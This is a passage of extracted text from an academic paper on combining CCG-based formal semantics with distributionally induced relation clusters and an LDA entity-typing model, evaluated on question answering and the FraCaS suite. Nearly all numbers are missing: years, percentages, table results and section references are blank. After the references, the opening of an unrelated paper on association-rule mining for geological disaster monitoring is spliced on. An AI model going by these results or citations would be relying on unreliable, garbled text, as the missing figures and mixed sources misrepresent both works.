n/pp[o f ] : λ xλ y.relation (x,y) write ` (s\np)/np : λ xλ y.relation (x,y) the only change to the standard ccg derivation is that the symbols used in the logical form are arbi- trary relation identifiers. we learn these by first map- ping to a deterministic logical form (using predicates such as author’ and write’), using a process simi- lar to boxer, and then clustering predicates based on their arguments. this lexicon can then be used to parse new sentences, and integrates seamlessly with ccg theories of formal semantics. typing predicates—for example, determining that writing is a relation between people and books— has become standard in relation clustering (schoen- mackers et al., ; berant et al., ; yao et al., ). we demonstate how to build a typing model into the ccg derivation, by subcategorizing all terms representing entities in the logical form with a more detailed type. these types are also in- duced from text, as explained in section , but for convenience we describe them with human-readable labels, such as per, loc and book. a key advantage of typing is that it allows us to model ambiguous predicates. following berant et al. ( ), we assume that different type signatures of the same predicate have different meanings, but given a type signature a predicate is unambiguous. for example a different lexical entry for the verb born is used in the contexts obama was born in hawaii and obama was born in , reflecting a distinction in the semantics that is not obvious in the syntax . typing also greatly improves the efficiency of clustering, as we only need to compare predicates with the same type during clustering (for example, we do not have to consider clustering a predicate between people and places with predicates between people and dates). in this work, we focus on inducing binary rela- tions. many existing approaches have shown how to produce good clusterings of (non-event) nouns (brown et al., ), any of which could be sim- ply integrated into our semantics—but relation clus- tering remains an open problem (see section ). n-ary relations are binarized, by creating a bi- nary relation between each pair of arguments. for example, for the sentence russia sold alaska to the united states, the system creates three binary relations— corresponding to selltosomeone(russia, alaska), buyfromsomeone(us, alaska), sellsome- thingto(russia, us). this transformation does not whilst this assumption is very useful, it does not always hold— for example, the genitive in shakespeare’s book is ambigu- ous between ownership and authorship relations even given the types of the arguments. exactly preserve meaning, but still captures the most important relations. note that this allows us to compare semantic relations across different syntac- tic types—for example, both transitive verbs and argument-taking nouns can be seen as expressing bi- nary semantic relations between entities. figure shows the layers used in our model. initial semantic analysis the initial semantic analysis maps parser output onto a logical form, in a similar way to boxer. the semantic formalism is based on steedman ( ). the first step is syntactic parsing. we use the c&c parser (clark and curran, ), trained on ccgbank (hockenmaier and steedman, ), us- ing the refined version of honnibal et al. ( ) which brings the syntax closer to the predicate- argument structure. an automatic post-processing step makes a number of minor changes to the parser output, which converts the grammar into one more suitable for our semantics. pp (prepositional phrase) and pr (phrasal verb complement) categories are sub-categorised with the relevant preposition. noun compounds with the same muc named-entity type (chinchor and robinson, ) are merged into a single non-compositional node (we otherwise ig- nore named-entity types). all argument nps and pps are type-raised, allowing us to represent quanti- fiers. all prepositional phrases are treated as core ar- guments (i.e. given the category pp, not adjunct cat- egories like (n\n)/np or ((s\np)\(s\np))/np), as it is difficult for the parser to distinguish argu- ments and adjuncts. initial semantic lexical entries for almost all words can be generated automatically from the syntactic category and pos tag (obtained from the parser), as the syntactic category captures the underlying predicate-argument structure. we use a davidsonian-style representation of arguments (davidson, ), which we binarize by creating a separate predicate for each pair of arguments of a word. these predicates are labelled with the lemma of the head word and a propbank-style argument key (kingsbury and palmer, ), e.g. arg , argin. we distinguish noun and verb predicates based on pos for example, this allows us to give barack obama the seman- tics λ x.barack obama(x) instead of λ x.barack(x)∧obama(x), which is more convenient for collecting distributional statistics. word category semantics automatic author n/pp[o f ] λ xλ y.authorarg ,argof (y,x) write (s\np)/np λ xλ y.writearg ,arg (y,x) manual every np↑/n λ pλ q.∀x[p(x)→ q(x)] not (s\np)/(s\np) λ pλ x.¬p(x) figure : example initial lexical entries tag—so, for example, we have different predicates for effect as a noun or verb. this algorithm can be overridden with man- ual lexical entries for specific closed-class function words. whilst it may be possible to learn these from data, our approach is pragmatic as there are relatively few such words, and the complex logical forms required would be difficult to induce from dis- tributional statistics. we add a small number of lexi- cal entries for words such as negatives (no, not etc.), and quantifiers (numbers, each, every, all, etc.). some example initial lexical entries are shown in figure . entity typing model our entity-typing model assigns types to nouns, which is useful for disambiguating polysemous predicates. our approach is similar to o’seaghdha ( ) in that we aim to cluster entities based on the noun and unary predicates applied to them (it is simple to convert from the binary predicates to unary predicates). for example, we want the pair (bornargin, ) to map to a dat type, and (bornargin, hawaii) to map to a loc type. this is non-trivial, as both the predicates and arguments can be ambiguous between multiple types—but topic models offer a good solution (described below). . topic model we assume that the type of each argument of a pred- icate depends only on the predicate and argument, although ritter et al. ( ) demonstrate an advan- tage of modelling the joint probability of the types of multiple arguments of the same predicate. we use the standard latent dirichlet allocation model (blei et al., ), which performs comparably to more complex models proposed in o’seaghdha ( ). in topic-modelling terminology, we construct a document for each unary predicate (e.g. bornargin), based on all of its argument entities (words). we as- sume that these arguments are drawn from a small number of types (topics), such as per, dat or loc . each type j has a multinomial distribution φ j over arguments (for example, a loc type is more likely to generate hawaii than ). each unary predicate i has a multinomial distribution θi over topics, so the bornargin predicate will normally gen- erate a dat or loc type. sparse dirichlet priors α and β on the multinomials bias the distributions to be peaky. the parameters are estimated by gibbs sampling, using the mallet implementation (mccal- lum, ). the generative story to create the data is: for every type k: draw the p(arg|k) distribution φk from dir(β ) for every unary predicate i: draw the p(type|i) distribution θi from dir(α) for every argument j: draw a type zi j from mult(θi) draw an argument wi j from mult(φθi) . typing in logical form in the logical form, all constants and variables repre- senting entities x can be assigned a distribution over types px(t) using the type model. an initial type distribution is applied in the lexicon, using the φ distributions for the types of nouns, and the θi dis- tributions for the type of arguments of binary predi- cates (inverted using bayes’ rule). then at each β - reduction in the derivation, we update probabilities of the types to be the product of the type distribu- tions of the terms being reduced. if two terms x and types are induced from the text, but we give human-readable labels here for convenience. file a suit (s\np)/np np↑ λ y : { doc = . legal = . clothes = . ... } λ x : { per = . org = . ... } . f ilearg ,arg (x,y) λ p.∃y : { clothes = . legal = . doc = . ... } [suit′(y)∧ p(y)] < s\np λ x : { per = . org = . ... } ∃y : { legal = . clothes = . doc = . ... } )[suit′(y)∧ f ilearg ,arg (x,y)] figure : using the type model for disambiguation in the derivation of file a suit. type distributions are shown after the variable declarations. both suit and the object of file are lexically ambiguous between different types, but after the β -reduction only one interpretation is likely. if the verb were wear, a different interpretation would be preferred. y combine to a term z: pz(t) = px(t)py(t) ∑ t′ px(t′)py(t′) for example, in wore a suit and file a suit, the vari- able representing suit may be lexically ambiguous between clothes and legal types, but the vari- ables representing the objects of wear and f ile will have preferences that allow us to choose the correct type when the terms combine. figure shows an example derivation using the type model for disam- biguation . distributional relation clustering model the typed binary predicates can be grouped into clusters, each of which represents a dis- tinct semantic relation. note that because we cluster typed predicates, bornarg :per,argin:loc and bornarg :per,argin:dat can be clustered separately. . corpus statistics typed binary predicates are clustered based on the expected number of times they hold between each argument-pair in the corpus. this means we cre- ate a single vector of argument-pair counts for each predicate (not a separate vector for each argument). for example, the vector for the typed predicate writearg :per,arg :book may contain non-zero counts for entity-pairs such as (shakespeare, macbeth), (dickens, oliver twist) and (rowling, harry potter). our implementation follows steedman ( ) in using gener- alized skolem terms rather than existential quantifiers, in order to capture quantifier scope alternations monotonically, but we omit these from the example to avoid introducing new notation. the entity-pair counts for authorarg :per,argof :book may be similar, on the assumption that both are sam- ples from the same underlying semantic relation. to find the expected number of occurrences of argument-pairs for typed binary predicates in a cor- pus, we first apply the type model to the derivation of each sentence, as described in section . . this outputs untyped binary predicates, with distributions over the types of their arguments. the type of the predicate must match the type of its arguments, so the type distribution of a binary predicate is simply the joint distribution of the two argument type dis- tributions. for example, if the arguments in a bornarg ,argin(obama,hawaii) derivation have the respective type distributions (per= . , loc= . ) and (loc= . , dat= . ), the distribution over bi- nary typed predicates is (bornarg :per,argin:loc= . , bornarg :per,argin:dat = . , etc.) the expected counts for (obama,hawaii) in the vectors for bornarg :per,argin:loc and bornarg :per,argin:dat are then incremented by these probabilities. . clustering many algorithms have been proposed for cluster- ing predicates based on their arguments (poon and domingos, ; yao et al., ). the number of relations in the corpus is unbounded, so the cluster- ing algorithm should be non-parametric. it is also important that it remains tractable for very large numbers of predicates and arguments, in order to give us a greater coverage of language than can be achieved by hand-built ontologies. we cluster the typed predicate vectors using the chinese whispers algorithm (biemann, )— although somewhat ad-hoc, it is both non-parametric and highly scalable . this has previously been used for noun-clustering by fountain and lapata ( ), who argue it is a cognitively plausible model for language acquisition. the collection of predicates and arguments is converted into a graph with one node per predicate, and edge weights representing the similarity between predicates. predicates with different types have zero-similarity, and otherwise similarity is computed as the cosine-similarity of the tf-idf vectors of argument-pairs. we prune nodes oc- curring fewer than times, edges with weights less than − , and a short list of stop predicates. the algorithm proceeds as follows: . each predicate p is assigned to a different se- mantic relation rp . iterate over the predicates p in a random order . set rp = arg max r ∑p′ r=rp′ sim(p, p ′), where sim(p, p′) is the distributional similarity be- tween p and p′, and r=r′ is iff r=r’ and otherwise. . repeat ( .) to convergence. semantic parsing using relation clusters the final phase is to use our relation clusters in the lexical entries of the ccg semantic derivation. this is slightly complicated by the fact that our predi- cates are lexically ambiguous between all the pos- sible types they could take, and hence the relations they could express. for example, the system can- not tell whether born in is expressing a birthplace or birthdate relation until later in the derivation, when it combines with its arguments. however, all the possible logical forms are identical except for the symbols used, which means we can produce a packed logical form capturing the full distribution over logical forms. to do this, we make the predi- cate a function from argument types to relations. for each word, we first take the lexical semantic definition produced by the algorithm in section . for binary predicates in this definition (which will we also experimented with a dirichlet process mixture model (neal, ), but even with the efficient a* search algorithms introduced by daumé iii ( ), the cost of inference was found to be prohibitively high when run at large scale. be untyped), we perform a deterministic lookup in the cluster model learned in section , using all pos- sible corresponding typed predicates. this allows us to represent the binary predicates as packed predi- cates: functions from argument types to relations. for example, if the clustering maps bornarg :per,argin:loc to rel (“birthplace”) and bornarg :per,argin:dat to rel (“birthdate”), our lexicon contains the following packed lexical entry (type-distributions on the variables are suppressed): born ` (s\np)/pp[in] : λ yλ x. { (x : per,y : loc)⇒rel (x : per,y : dat)⇒rel } (x,y) the distributions over argument types then imply a distribution over relations. for example, if the packed-predicate for bornarg ,argin is applied to ar- guments obama and hawaii, with respective type distributions (per= . , loc= . ) and (loc= . , dat= . ) , the distribution over relations will be (rel = . , rel = . , etc.). if has a type-distribution (loc= . , dat= . ), the output packed-logical form for obama was born in hawaii in will be:    rel = . rel = . ...   (ob,hw)∧    rel = . rel = . ...   (ob, ) the probability of a given logical form can be read from this packed logical form. experiments our approach aims to offer a strong model of both formal and lexical semantics. we perform two eval- uations, aiming to target each of these separately, but using the same semantic representations in each. we train our system on gigaword (graff et al., ), which contains around billion words of newswire. the type-model is trained using types , and , iterations of gibbs sampling (us- ing the distributions from the final sample). table these distributions are composed from the type-distributions for both the predicate and argument, as explained in section this number was chosen by examination of models trained with different numbers of types. the algorithm produces se- mantically coherent clusters for much larger numbers of types, but many of these are fine-grained categories of people, which introduces sparsity in the relation clustering. type top words suspect, assailant, fugitive, accomplice author, singer, actress, actor, dad city, area, country, region, town, capital subsidiary, automaker, airline, co., gm musical, thriller, sequel, special table : most probable terms in some clusters induced by the type model. shows some example types. the relation clustering uses only proper nouns, to improve precision (spar- sity problems are partly offset by the large input cor- pus). aside from parsing, the pipeline takes around a day to run using cores. . question answering experiments as yet, there is no standard way of evaluating lexical semantics. existing tasks like recognising textual entailment (rte; dagan et al., ) rely heavily on background knowledge, which is beyond the scope of this work. intrinsic evaluations of entailment rela- tions have low inter-annotator agreement (szpektor et al., ), due to the difficulty of evaluating rela- tions out of context. our evaluation is based on that performed by poon and domingos ( ). we automatically con- struct a set of questions by sampling from text, and then evaluate how many answers can be found in a different corpus. from dependency-parsed newswire, we sample either x nsub j← verbdob j→ y, xnsub j← verb pob j→ y or xnsub j← be dob j→ nounpob j→ y patterns, where x and y are proper nouns and the verb is not on a list of stop verbs, and deterministically con- vert these to questions. for example, from google bought youtube we create the questions what did google buy? and what bought youtube?. the task is to find proper-noun answers to these questions in a different corpus, which are then evaluated by hu- man annotators based on the sentence the answer was retrieved from . systems can return multiple common nouns are filtered automatically. to focus on evalu- ating the semantics, annotators ignored garbled sentences due to errors pre-processing the corpus (these are excluded from the results). we also automatically exclude weekday and month answers, which are overwhelmingly syntax errors for all systems—e.g. treating tuesday as an object in obama an- nounced tuesday that... answers to the same question (e.g. what did google buy? may have many valid answers), and all of these contribute to the result. as none of the systems model tense or temporal semantics, annotators were instructed to annotate answers as correct if they were true at any time. this approach means we evaluate on relations in proportion to corpus frequency. we sample questions from the new york times subset of gigaword from , and search for an- swers in the new york times from . we evaluate the following approaches: • ccg-baseline the logical form produced by our ccg derivation, without the clustering. • ccg-wordnet the ccg logical form, plus wordnet as a model of lexical semantics. • ccg-distributional the logical form includ- ing the type model and clusters. • relational lda an lda based model for clustering dependency paths (yao et al., ). we train on new york times subset of giga- word , using their setup of iterations with relation types. • reverb a sophisticated open information ex- traction system (fader et al., ). unsupervised semantic parsing (usp; poon and domingos, ; usp; poon and domingos, ; usp; titov and klementiev, ) would be another obvious baseline. however, memory requirements mean it is not possible to run at this scale (our system is trained on orders of magnitude more data than the usp evaluation). yao et al. ( ) found it had comparable performance to relational lda. for the ccg models, rather than performing full first-order inference on a large corpus, we simply test whether the question predicate subsumes a can- didate answer predicate, and whether the arguments match . in the case of ccg-distributional, we cal- culate the probability that the two packed-predicates this is around % of gigaword, and was the largest scale possible on our resources. we do this as it is much more efficient than full first-order theorem-proving. we could in principle make additional in- ferences with theorem-proving, such as answering what did google buy? from google bought the largest video website and youtube is the largest video website. system answers correct relational-lda . % reverb . % ccg-baseline . % ccg-wordnet . % ccg-distributional@ . % ccg-distributional@ . % table : results on wide-coverage question answer- ing task. ccg-distributional ranks question/answer pairs by confidence—@ means we evaluate the top of these. it is not possible to give a recall figure, as the total number of correct answers in the corpus is unknown. are in the same cluster, marginalizing over their ar- gument types. answers are ranked by this proba- bility. for ccg-wordnet, we check if the ques- tion predicate is a hypernym of the candidate answer predicate (using any wordnet sense of either term). results are shown in table . relational-lda in- duces many meaningful clusters, but predicates must be assigned to one of relations, so results are dominated by large, noisy clusters (it is not possi- ble to take the n-best answers as the cluster assign- ments do not have a confidence score). the ccg- baseline errors are mainly caused by parser errors, or relations in the scope of non-factive operators. ccg-wordnet adds few answers to ccg-baseline, reflecting the limitations of hand-built ontologies. ccg-distributional substantially improves recall over other approaches whilst retaining good preci- sion, demonstrating that we have learnt a powerful model of lexical semantics. table shows some correctly answered questions. the system improves over the baseline by mapping expressions such as merge with and acquisition of to the same relation cluster. many of the errors are caused by conflating predicates where the entailment only holds in one direction, such as was elected to with ran for. hier- archical clustering could be used to address this. . experiments on the fracas suite we are also interested in evaluating our approach as a model of formal semantics—demonstrating that it is possible to integrate the formal semantics of steedman ( ) with our distributional clusters. the fracas suite (cooper et al., ) contains a hand-built set of entailment problems designed to be challenging in terms of formal semantics. we use section , which contains problems requiring an understanding of quantifiers . they do not re- quire any knowledge of lexical semantics, meaning we can evaluate the formal component of our system in isolation. however, we use the same representa- tions as in our previous experiment, even though the clusters provide no benefit on this task. figure gives an example problem. the only previous work we are aware of on this dataset is by maccartney and manning ( ). this approach learns the monotonicity properties of words from a hand-built training set, and uses this to transform a sentence into a polarity anno- tated string. the system then aims to transform the premise string into a hypothesis. positively polar- ized words can be replaced with less specific ones (e.g. by deleting adjuncts), whereas negatively po- larized words can be replaced with more specific ones (e.g. by adding adjuncts). whilst this is high- precision and often useful, this logic is unable to per- form inferences with multiple premise sentences (in contrast to our first-order logic). development consists of adding entries to our lex- icon for quantifiers. for simplicity, we treat multi- word quantifiers like at least a few, as being multi- word expressions—although a more compositional analysis may be possible. following maccartney and manning ( ), we do not use held-out data— each problem is designed to test a different issue, so it is not possible to generalize from one subset of the suite to another. as we are interested in evaluating the semantics, not the parser, we manually supply gold-standard lexical categories for sentences with parser errors (any syntactic mistake causes incorrect semantics). our derivations produce a distribution over logical forms—we license the inference if it holds in any interpretation with non-zero probabil- ity. we use the prover (mccune, ) theorem prover for inference, returning yes if the premise im- plies the hypothesis, no if it implies the negation of the hypothesis, and unknown otherwise. results are shown in table . our system im- we use the version converted to machine readable format by maccartney and manning ( ) excluding problems without a defined solution. question answer sentence what did delta merge with? northwest the freighters came with delta’s acquisition of northwest what spoke with hu jintao? obama obama conveyed his respect for the dalai lama to china’s president hu jintao during their first meeting. . . what arrived in colorado? zazi zazi flew back to colorado. . . what ran for congress? young . . . young was elected to congress in table : example questions correctly answered by ccg-distributional. premises: every european has the right to live in europe. every european is a person. every person who has the right to live in europe can travel freely within europe. hypothesis: every european can travel freely within europe solution: yes figure : example problem from the fracas suite. system single multiple premise premises maccartney&manning % - maccartney&manning % - ccg-dist (parser syntax) % % ccg-dist (gold syntax) % % table : accuracy on section of the fracas suite. problems are divided into those with one premise sen- tence ( ) and those with multiple premises ( ). proves on previous work by making multi-sentence inferences. causes of errors include missing a dis- tinct lexical entry for plural the, only taking existen- tial interpretations of bare plurals, failing to inter- pret mass-noun determiners such as a lot of, and not providing a good semantics for non-monotone de- terminers such as most. we believe these problems will be surmountable with more work. almost all er- rors are due to incorrectly predicting unknown — the system makes just one error on yes or no predictions (with or without gold syntax). this suggests that making first-order logic inferences in applications will not harm precision. we are less robust than maccartney and manning ( ) to syntax errors but, conversely, we are able to attempt more of the problems (i.e. those with multi-sentence premises). other approaches based on distributional semantics seem unable to tackle any of these problems, as they do not represent quantifiers or negation. related work much work on semantics has taken place in a su- pervised setting—for example the geoquery (zelle and mooney, ) and atis (dahl et al., ) se- mantic parsing tasks. this approach makes sense for generating queries for a specific database, but means the semantic representations do not generalize to other datasets. there have been several attempts to annotate larger corpora with semantics—such as ontonotes (hovy et al., ) or the groningen meaning bank (basile et al., ). these typically map words onto senses in ontologies such as word- net, verbnet (kipper et al., ) and framenet (baker et al., ). however, limitations of these ontologies mean that they do not support inferences such as x is the author of y → x wrote y. given the difficulty of annotating large amounts of text with semantics, various approaches have at- tempted to learn meaning without annotated text. distant supervision approaches leverage existing knowledge bases, such as freebase (bollacker et al., ), to learn semantics (mintz et al., ; krish- namurthy and mitchell, ). dependency-based compositional semantics (liang et al., ) learns the meaning of questions by using their answers as denotations—but this appears to be specific to ques- tion parsing. such approaches can only learn the pre-specified relations in the knowledge base. the approaches discussed so far in this section have all attempted to map language onto some pre- specified set of relations. various attempts have been made to instead induce relations from text by clustering predicates based on their arguments. for example, yao et al. ( ) propose a series of lda- based models which cluster relations between en- tities based on a variety of lexical, syntactic and semantic features. unsupervised semantic pars- ing (poon and domingos, ) recursively clusters fragments of dependency trees based on their argu- ments. although usp is an elegant model, it is too computationally expensive to run on large corpora. it is also based on frame semantics, so does not clus- ter equivalent predicates with different frames. to our knowledge, our work is the first such approach to be integrated within a linguistic theory supporting formal semantics for logical operators. vector space models represent words by vectors based on co-occurrence counts. recent work has tackled the problem of composing these matrices to build up the semantics of phrases or sentences (mitchell and lapata, ). another strand (co- ecke et al., ; grefenstette et al., ) has shown how to represent meanings as tensors, whose order depends on the syntactic category, allowing an elegant correspondence between syntactic and semantic types. socher et al. ( ) train a com- position function using a neural network—however their method requires annotated data. it is also not obvious how to represent logical relations such as quantification in vector-space models. baroni et al. ( ) make progress towards this by learning a classifier that can recognise entailments such as all dogs =⇒ some dogs, but this remains some way from the power of first-order theorem proving of the kind required by the problem in figure . an alternative strand of research has attempted to build computational models of linguistic theories based on formal compositional semantics, such as the ccg-based boxer (bos, ) and the lfg- based xle (bobrow et al., ). such approaches convert parser output into formal semantic repre- sentations, and have demonstrated some ability to model complex phenomena such as negation. for lexical semantics, they typically compile lexical re- sources such as verbnet and wordnet into inference rules—but still achieve only low recall on open- domain tasks, such as rte, mostly due to the low coverage of such resources. garrette et al. ( ) use distributional statistics to determine the proba- bility that a wordnet-derived inference rule is valid in a given context. our approach differs in that we learn inference rules not present in wordnet. our lexical semantics is integrated into the lexicon, rather than being implemented as additional infer- ence rules, meaning that inference is more efficient, as equivalent statements have the same logical form. natural logic (maccartney and manning, ) offers an interesting alternative to symbolic logics, and has been shown to be able to capture complex logical inferences by simply identifying the scope of negation in text. this approach achieves similar pre- cision and much higher recall than boxer on the rte task. their approach also suffers from such limita- tions as only being able to make inferences between two sentences. it is also sensitive to word order, so cannot make inferences such as shakespeare wrote macbeth =⇒ macbeth was written by shakespeare. conclusions and future work this is the first work we are aware of that combines a distributionally induced lexicon with formal seman- tics. experiments suggest our approach compares favourably with existing work in both areas. many potential areas for improvement remain. hierachical clustering would allow us to capture hypernym relations, rather than the synonyms cap- tured by our flat clustering. there is much potential for integrating existing hand-built resources, such as ontonotes and wordnet, to improve the accu- racy of clustering. there are cases where the ex- isting ccgbank grammar does not match the re- quired predicate-argument structure—for example in the case of light verbs. it may be possible to re- bank ccgbank, in a way similar to honnibal et al. ( ), to improve it on this point. acknowledgements we thank christos christodoulopoulos, tejaswini deoskar, mark granroth-wilding, ewan klein, ka- trin erk, johan bos and the anonymous reviewers for their helpful comments, and limin yao for shar- ing code. this work was funded by erc advanced fellowship gramplus and ip ec-fp - xperience. references c.f. baker, c.j. fillmore, and j.b. lowe. . the berkeley framenet project. in proceedings of the th annual meeting of the association for computa- tional linguistics and th international conference on computational linguistics-volume , pages – . association for computational linguistics. m. baroni, r. bernardi, n.q. do, and c. shan. . entailment above the word level in distributional se- mantics. in proceedings of eacl, pages – . cite- seer. v. basile, j. bos, k. evang, and n. venhuizen. . developing a large semantically annotated corpus. in proceedings of the eighth international conference on language resources and evaluation (lrec ). to appear. jonathan berant, ido dagan, and jacob goldberger. . global learning of typed entailment rules. in proceedings of the th annual meeting of the asso- ciation for computational linguistics: human lan- guage technologies - volume , hlt ’ , pages – . association for computational linguistics. c. biemann. . chinese whispers: an efficient graph clustering algorithm and its application to natural lan- guage processing problems. in proceedings of the first workshop on graph based methods for natural language processing, pages – . association for computational linguistics. d.m. blei, a.y. ng, and m.i. jordan. . latent dirichlet allocation. the journal of machine learning research, : – . d. g. bobrow, c. condoravdi, r. crouch, v. de paiva, l. karttunen, t. h. king, r. nairn, l. price, and a. zaenen. . precision-focused textual inference. in proceedings of the acl-pascal workshop on tex- tual entailment and paraphrasing, rte ’ , pages – . association for computational linguistics. kurt bollacker, colin evans, praveen paritosh, tim sturge, and jamie taylor. . freebase: a col- laboratively created graph database for structuring hu- man knowledge. in proceedings of the acm sigmod international conference on management of data, sigmod ’ , pages – , new york, ny, usa. acm. j. bos and k. markert. . recognising textual en- tailment with logical inference. in proceedings of the conference on human language technology and empirical methods in natural language processing, pages – . association for computational lin- guistics. johan bos. . wide-coverage semantic analysis with boxer. in johan bos and rodolfo delmonte, editors, semantics in text processing. step conference proceedings, research in computational semantics, pages – . college publications. p.f. brown, p.v. desouza, r.l. mercer, v.j.d. pietra, and j.c. lai. . class-based n-gram models of natural language. computational linguistics, ( ): – . n. chinchor and p. robinson. . muc- named entity task definition. in proceedings of the th conference on message understanding. stephen clark and james r. curran. . parsing the wsj using ccg and log-linear models. in proceed- ings of the nd annual meeting on association for computational linguistics, acl ’ . association for computational linguistics. bob coecke, mehrnoosh sadrzadeh, and stephen clark. . mathematical foundations for a compositional distributional model of meaning. linguistic analysis: a festschrift for joachim lambek, ( - ): – . robin cooper, dick crouch, jan van eijck, chris fox, johan van genabith, jan jaspars, hans kamp, david milward, manfred pinkal, massimo poesio, et al. . using the framework. fracas deliverable d, . ido dagan, o. glickman, and b. magnini. . the pascal recognising textual entailment challenge. machine learning challenges. evaluating predictive uncertainty, visual object classification, and recog- nising tectual entailment, pages – . d.a. dahl, m. bates, m. brown, w. fisher, k. hunicke- smith, d. pallett, c. pao, a. rudnicky, and e. shriberg. . expanding the scope of the atis task: the atis- corpus. in proceedings of the work- shop on human language technology, pages – . association for computational linguistics. hal daumé iii. . fast search for dirichlet process mixture models. in proceedings of the eleventh in- ternational conference on artificial intelligence and statistics (aistats), san juan, puerto rico. d. davidson. . . the logical form of action sen- tences. essays on actions and events, ( ): – . anthony fader, stephen soderland, and oren etzioni. . identifying relations for open information extraction. in proceedings of the conference on empirical methods in natural language processing, emnlp ’ , pages – . association for com- putational linguistics. t. fountain and m. lapata. . incremental models of natural language category acquisition. in proceedings of the st annual conference of the cognitive science society. d. garrette, k. erk, and r. mooney. . integrating logical representations with probabilistic information using markov logic. in proceedings of the ninth in- ternational conference on computational semantics, pages – . association for computational lin- guistics. d. graff, j. kong, k. chen, and k. maeda. . english gigaword. linguistic data consortium, philadelphia. edward grefenstette, mehrnoosh sadrzadeh, stephen clark, bob coecke, and stephen pulman. . con- crete sentence spaces for compositional distributional models of meaning. computational semantics iwcs , page . julia hockenmaier and mark steedman. . ccg- bank: a corpus of ccg derivations and dependency structures extracted from the penn treebank. compu- tational linguistics, ( ): – . m. honnibal, j.r. curran, and j. bos. . rebanking ccgbank for improved np interpretation. in proceed- ings of the th annual meeting of the association for computational linguistics, pages – . associa- tion for computational linguistics. e. hovy, m. marcus, m. palmer, l. ramshaw, and r. weischedel. . ontonotes: the % solution. in proceedings of the human language technology conference of the naacl, companion volume: short papers, pages – . association for computational linguistics. p. kingsbury and m. palmer. . from treebank to propbank. in proceedings of the rd international conference on language resources and evaluation (lrec- ), pages – . citeseer. k. kipper, h.t. dang, and m. palmer. . class-based construction of a verb lexicon. in proceedings of the national conference on artificial intelligence, pages – . menlo park, ca; cambridge, ma; london; aaai press; mit press; . jayant krishnamurthy and tom m. mitchell. . weakly supervised training of semantic parsers. in proceedings of the joint conference on empir- ical methods in natural language processing and computational natural language learning, emnlp- conll ’ , pages – . association for compu- tational linguistics. p. liang, m.i. jordan, and d. klein. . learning dependency-based compositional semantics. in proc. association for computational linguistics (acl). dekang lin and patrick pantel. . dirt - discovery of inference rules from text. in in proceedings of the acm sigkdd conference on knowledge discovery and data mining, pages – . bill maccartney and christopher d. manning. . natural logic for textual inference. in proceedings of the acl-pascal workshop on textual entailment and paraphrasing, rte ’ , pages – . associa- tion for computational linguistics. andrew kachites mccallum. . mal- let: a machine learning for language toolkit. http://mallet.cs.umass.edu. w. mccune. . prover and mace . http://cs.unm.edu/˜mccune/mace /. g.a. miller. . wordnet: a lexical database for en- glish. communications of the acm, ( ): – . m. mintz, s. bills, r. snow, and d. jurafsky. . dis- tant supervision for relation extraction without labeled data. in proceedings of the joint conference of the th annual meeting of the acl and the th interna- tional joint conference on natural language process- ing of the afnlp: volume -volume , pages – . association for computational linguistics. j. mitchell and m. lapata. . vector-based models of semantic composition. proceedings of acl- : hlt, pages – . r.m. neal. . markov chain sampling methods for dirichlet process mixture models. journal of compu- tational and graphical statistics, ( ): – . d.o. o’seaghdha. . latent variable models of se- lectional preference. in proceedings of the th an- nual meeting of the association for computational linguistics, pages – . association for compu- tational linguistics. hoifung poon and pedro domingos. . unsuper- vised semantic parsing. in proceedings of the conference on empirical methods in natural lan- guage processing: volume - volume , emnlp ’ , pages – . association for computational linguis- tics. hoifung poon and pedro domingos. . unsuper- vised ontology induction from text. in proceedings of the th annual meeting of the association for com- putational linguistics, acl ’ , pages – . as- sociation for computational linguistics. a. ritter, o. etzioni, et al. . a latent dirichlet allo- cation method for selectional preferences. in proceed- ings of the th annual meeting of the association for computational linguistics, pages – . associa- tion for computational linguistics. stefan schoenmackers, oren etzioni, daniel s. weld, and jesse davis. . learning first-order horn clauses from web text. in proceedings of the conference on empirical methods in natural lan- guage processing, emnlp ’ , pages – . association for computational linguistics. r. socher, b. huval, c.d. manning, and a.y. ng. . semantic compositionality through recursive matrix- vector spaces. in proceedings of the joint conference on empirical methods in natural lan- guage processing and computational natural lan- guage learning, pages – . association for computational linguistics. mark steedman. . the syntactic process. mit press. mark steedman. . taking scope: the natural se- mantics of quantifiers. mit press. idan szpektor, eyal shnarch, and ido dagan. . instance-based evaluation of entailment rule acquisi- tion. in in proceedings of acl , volume , page . ivan titov and alexandre klementiev. . a bayesian model for unsupervised semantic parsing. in proceed- ings of the th annual meeting of the association for computational linguistics: human language tech- nologies, pages – , portland, oregon, usa, june. association for computational linguistics. limin yao, aria haghighi, sebastian riedel, and andrew mccallum. . structured relation discovery using generative models. in proceedings of the conference on empirical methods in natural language process- ing, emnlp ’ , pages – . association for computational linguistics. limin yao, sebastian riedel, and andrew mccallum. . unsupervised relation discovery with sense dis- ambiguation. in acl ( ), pages – . j.m. zelle and r.j. mooney. . learning to parse database queries using inductive logic programming. in proceedings of the national conference on artifi- cial intelligence, pages – . 基于hadoop的倒排索引树增量更新关联挖掘并行算法 international conference on sensor network and computer engineering (icsnce ) application of incremental updating association mining algorithm in geological disasters system wang jianguo school of computer science and engineering xi’an technological university xi’an, , china e-mail: wjg_xit@ .com zhu ying school of computer science and engineering xi’an technological university xi’an, , china e-mail: @qq.com abstract—aiming at the problems of low efficiency, low cost of time and space, this paper proposes an algorithm to update the association mining of the inverted index tree. the algorithm combines the inverted index technology with the tree structure. when the data in the database is continuously updated, it can scan only the newly added part of the database, without having to scan the original database to count the number of transaction items. the optimal threshold predicted by newton's interpolation formula is compared with this frequency to get frequent item sets. then, the confidence level is calculated for the combinations of different item sets in frequent item sets, and the correlation rules are obtained, and the correlation analysis of the rules is carried out to obtain a more realistic association rule. the inverted index tree updating association mining algorithm was applied to the data analysis of geological hazards monitoring system. one year data record of rainfall, groundwater level, soil water content and topography data was selected as the experimental data set. compared with the iuar algorithm, it is found that the inverted index tree updating association mining algorithm has some improvements in memory consumption and efficiency. the experimental results show that when the minimum support of iuar algorithm remains unchanged, the number of transaction records is the same as the amount of new data, and inverted index tree incremental updating association mining algorithm takes less than / of the iuar algorithm. when the number of transaction records and the amount of new data remain unchanged and iuar algorithm support changes, the inverted index tree incremental updating association mining algorithm memory consumption is much smaller than iuar algorithm. in the process of experiment, according to the results of the inverted index tree incremental updating association mining algorithm, the association rules are obtained and the correlation is judged. the strong association rules are used to set the alarm threshold of the geological disaster monitoring system. keywords-inverted index tree; geological disaster system; frequent item sets; association rules i. introduction geological disasters are geological phenomena that cause serious harm or potential threat to human lives and property. human activities can affect the occurrence of geological disasters and the extent of their damage, but they can not be completely eliminated or prevented. in addition to earthquakes, volcanoes, tsunamis and other 